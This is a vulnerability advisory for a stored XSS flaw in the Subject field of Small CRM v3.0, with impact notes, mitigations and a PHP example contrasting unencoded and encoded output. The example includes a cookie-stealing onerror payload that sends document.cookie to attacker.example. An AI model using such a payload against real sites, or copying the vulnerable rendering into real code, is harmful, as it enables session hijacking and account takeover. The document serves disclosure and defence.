CVE-2022-47073: Stored XSS found in Small CRM (phpgurukul) - Shiva Kumar M V - Medium

A cross-site scripting (XSS) vulnerability in the Create Ticket page of Small CRM v3.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Subject parameter.


# Exploit Title: Small CRM — Stored Cross-Site Scripting Vulnerability
# Date: 12-Nov-2022
# Exploit Author: Venkata Siva Kumar Medituru
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/small-crm-php/
# Version: 3.0
# Tested on: Windows 10
# Contact: https://www.linkedin.com/in/shivakumar-m-v/

Stored XSS Vulnerability: Cross-site scripting (XSS) attacks are a type of injection attack in which malicious script is injected through an application input field. If the application neither validates the input nor encodes it when it is rendered, the attacker-supplied script is executed in the browser of every user who views the affected page, with that user's session and privileges. The script runs client-side, in the victim's browser, not on the server.

Stored attacks are those where the injected script is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information. Stored XSS is also sometimes referred to as Persistent or Type-II XSS.

Attack vector: An attacker injects an XSS payload into the Subject input field on the "Create Ticket" page. Because the value is stored in the database and rendered without encoding, the payload fires every time a user opens the "View Ticket" page, and a crafted payload can, for example, send that user's cookies to an attacker-controlled host.

Vulnerable Parameter: Subject.

Reproduction steps are given in the video PoC.

Impact:

Stored XSS can lead to cookie theft, session hijacking, redirection to attacker-controlled sites, account takeover and other actions performed in the victim's browser with the victim's privileges.

Mitigations:

  1. Deploy a Web Application Firewall as defence in depth. It can block common payloads but does not fix the underlying flaw, and filter bypasses are routine.

  2. Configure security headers, in particular Content-Security-Policy, to limit what an injected script can do (block inline scripts and script loaded from untrusted origins). Headers do not validate user input; they reduce impact when an encoding step has been missed.

  3. Contextually encode user-supplied data at output time wherever it is rendered (HTML body, attribute value, JavaScript, URL), and validate input server-side against the expected format. Encoding on output is the fix for this class of bug; a WAF and CSP are only layers on top of it.
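As an added example (not code from Small CRM or from the advisory author), the PHP snippet below shows how a stored Subject value becomes stored XSS when echoed unencoded on a View Ticket page, and the hardened rendering of the same value for the HTML body and attribute contexts, plus a Content-Security-Policy header as the defence-in-depth layer. The function names, the sample payload and the CSP policy are hypothetical and constructed for illustration.

```php
<?php
// Added illustration, not Small CRM's source. All names are hypothetical.

// A Subject value as an attacker would submit it on Create Ticket. In the real
// application it is written to the database and read back on View Ticket.
// Constructed sample, not a real ticket.
$storedSubject = '<img src=x onerror="document.location=\'https://attacker.example/?c=\'+document.cookie">';

// Vulnerable rendering: the stored value is echoed into the HTML body as-is,
// so the browser of every user who opens the ticket runs the onerror handler.
function renderSubjectVulnerable(string $subject): string
{
    return '<td>' . $subject . '</td>';
}

// Hardened rendering: encode for the HTML body context at output time.
// ENT_QUOTES also encodes ' and ", so the same call is safe inside attribute
// values; ENT_SUBSTITUTE avoids returning an empty string on invalid UTF-8.
function encodeHtml(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function renderSubjectSafe(string $subject): string
{
    return '<td>' . encodeHtml($subject) . '</td>';
}

// Same data inside an attribute, e.g. a pre-filled edit form. The quote
// encoding is what stops an attacker from closing the attribute early.
function renderSubjectInputSafe(string $subject): string
{
    return '<input type="text" name="subject" value="' . encodeHtml($subject) . '">';
}

// Defence in depth: a CSP without 'unsafe-inline' blocks inline event handlers
// such as onerror and script from other origins, so a missed encoding step
// yields far less. Must be sent before any output.
function sendCspHeader(): void
{
    header("Content-Security-Policy: default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'");
}

if (PHP_SAPI === 'cli') {
    echo "vulnerable: ", renderSubjectVulnerable($storedSubject), PHP_EOL;
    echo "body:       ", renderSubjectSafe($storedSubject), PHP_EOL;
    echo "attribute:  ", renderSubjectInputSafe($storedSubject), PHP_EOL;
}
```

Run it from the command line to see the raw tag beside its encoded form; the encoded output is inert in both the body and attribute positions. Two practical caveats: a CSP this strict will break any existing inline scripts in the application, so roll it out in report-only mode first; and the cookie-theft payload only works against cookies that are not flagged HttpOnly, so set session.cookie_httponly for the session cookie regardless of the XSS fix.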
